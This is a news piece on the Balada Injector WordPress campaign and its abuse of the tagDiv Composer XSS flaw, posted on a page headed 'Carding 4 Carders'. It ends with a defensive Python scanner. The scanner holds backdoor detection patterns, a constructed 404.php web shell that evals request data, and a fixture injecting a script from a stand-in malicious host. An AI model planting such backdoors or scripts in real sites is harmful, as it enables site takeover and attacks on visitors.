Balada Injector infected thousands of WordPress sites via a tagDiv Composer vulnerability

Carding 4 Carders

Even premium themes can sometimes bring unpleasant surprises to site owners.

The ongoing Balada Injector malware campaign has infected more than 17,000 WordPress sites by exploiting known vulnerabilities in premium (paid) theme plugins.

A study published by Dr. Web in December 2022 revealed a malicious campaign in which a Linux backdoor exploited known WordPress vulnerabilities to compromise sites. Infected sites redirected visitors to fake technical-support pages, fraudulent sweepstakes, and bogus prize notifications.

Sucuri reported in April 2023 that Balada Injector has been active since at least 2017 and that the total number of sites compromised over its lifetime long ago exceeded one million.

In one of the latest waves, attackers exploited a cross-site scripting (XSS) vulnerability, CVE-2023-3169, in the tagDiv Composer plugin, the page-builder companion to the popular Newspaper and Newsmag themes. Infections began in mid-September, shortly after the vulnerability was disclosed and a proof-of-concept exploit was published.

According to public statistics from Envato Market, Newspaper has about 137,000 sales and Newsmag more than 18,500, so the exposed install base is roughly 155,500 sites, not counting pirated copies. These premium themes are typically used by established, high-traffic sites.

A tagDiv representative confirmed that the company is aware of the issue: "We are aware of such cases. Malware can affect sites that use older versions of themes." He also recommended updating installed copies of Newspaper or Newsmag and installing a security plugin such as Wordfence.

Sucuri notes in a recent report that in September alone more than 17,000 websites were compromised by various Balada Injector variants, more than 9,000 of them through CVE-2023-3169. A characteristic feature of this wave is a malicious script injected into the site's database, from which it is rendered into the site's pages.

Sucuri recently recorded six distinct attack waves, each with its own characteristics. In one of them, the attackers placed a backdoor directly in the theme's 404.php file, the template served when a requested resource is not found.

To protect against Balada Injector, update the tagDiv Composer plugin to version 4.2 or later, which fixes the vulnerability. Also keep all themes and plugins up to date, delete inactive user accounts, and regularly scan site files and the database for hidden backdoors and injected scripts.
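As an added illustration of the last recommendation, here is a small Python scanner for the two injection styles described above: a PHP backdoor dropped into a theme's 404.php, and a script stored in the database. This is example code written for this post, not a tool from Sucuri, tagDiv or the article; the backdoor patterns are generic indicators (assumed, not Balada-specific signatures), the option name `theme_custom_css` is hypothetical, the CSV layout assumes an `option_name,option_value` export such as `wp option list --format=csv`, and all sample files and values are constructed.

```python
"""Added example: scan a WordPress tree and an options export for a PHP
backdoor in 404.php and a <script> stored in the database.  Patterns are
generic indicators, not Balada Injector signatures; all sample data is
constructed for the demonstration."""
import csv
import io
import re
import tempfile
from pathlib import Path

# Generic PHP backdoor indicators (assumed; tune for your own site).
PHP_BACKDOOR_PATTERNS = {
    "eval of decoded payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "request data executed": re.compile(
        r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "dynamic function from request": re.compile(
        r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I),
}
# A <script> tag inside a stored option value is the stored-XSS indicator.
STORED_SCRIPT = re.compile(r"<\s*script\b", re.I)


def scan_php_source(source: str) -> list[str]:
    """Return the names of backdoor patterns found in one PHP source text."""
    return [name for name, rx in PHP_BACKDOOR_PATTERNS.items() if rx.search(source)]


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk every .php file under root; map relative path -> findings (hits only)."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        findings = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            hits[path.relative_to(root).as_posix()] = findings
    return hits


def scan_options_csv(text: str) -> list[tuple[str, str]]:
    """Flag rows of an option_name,option_value CSV export (assumed layout,
    e.g. `wp option list --format=csv`) whose value carries a <script> tag."""
    flagged = []
    for row in csv.DictReader(io.StringIO(text)):
        if STORED_SCRIPT.search(row.get("option_value", "")):
            flagged.append((row["option_name"], "script tag in stored value"))
    return flagged


# Constructed sample theme files.  theme-a is clean; theme-b carries a
# hand-written backdoor in the style described above (not a real sample).
CLEAN_404 = """<?php
get_header(); ?>
<h1><?php esc_html_e('Page not found', 'theme-a'); ?></h1>
<?php get_footer();
"""

BACKDOORED_404 = """<?php
get_header();
if (isset($_POST['c'])) { eval(base64_decode($_POST['c'])); }
if (isset($_REQUEST['f'])) { $_REQUEST['f']($_REQUEST['a']); }
?>
<h1>Page not found</h1>
<?php get_footer();
"""

# Constructed options export; 'theme_custom_css' is a hypothetical option
# whose stored value breaks out of a <style> block into a <script> tag.
OPTIONS_CSV = (
    "option_name,option_value\n"
    "siteurl,https://example.test\n"
    'theme_custom_css,"body{margin:0}</style>'
    '<script src=""https://malicious.example/inject.js""></script><style>"\n'
)


def build_sample_tree() -> Path:
    """Write the constructed theme files into a temp directory and return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    for theme, body in (("theme-a", CLEAN_404), ("theme-b", BACKDOORED_404)):
        target = root / "wp-content" / "themes" / theme / "404.php"
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for rel, findings in scan_tree(build_sample_tree()).items():
        print(f"{rel}: {', '.join(findings)}")
    for name, reason in scan_options_csv(OPTIONS_CSV):
        print(f"wp_options[{name}]: {reason}")
```

On a real install, point `scan_tree` at the WordPress root and feed `scan_options_csv` an actual options export; treat every hit as something to review by hand rather than as proof of compromise, since legitimate plugins sometimes store script tags and some custom code uses `eval`.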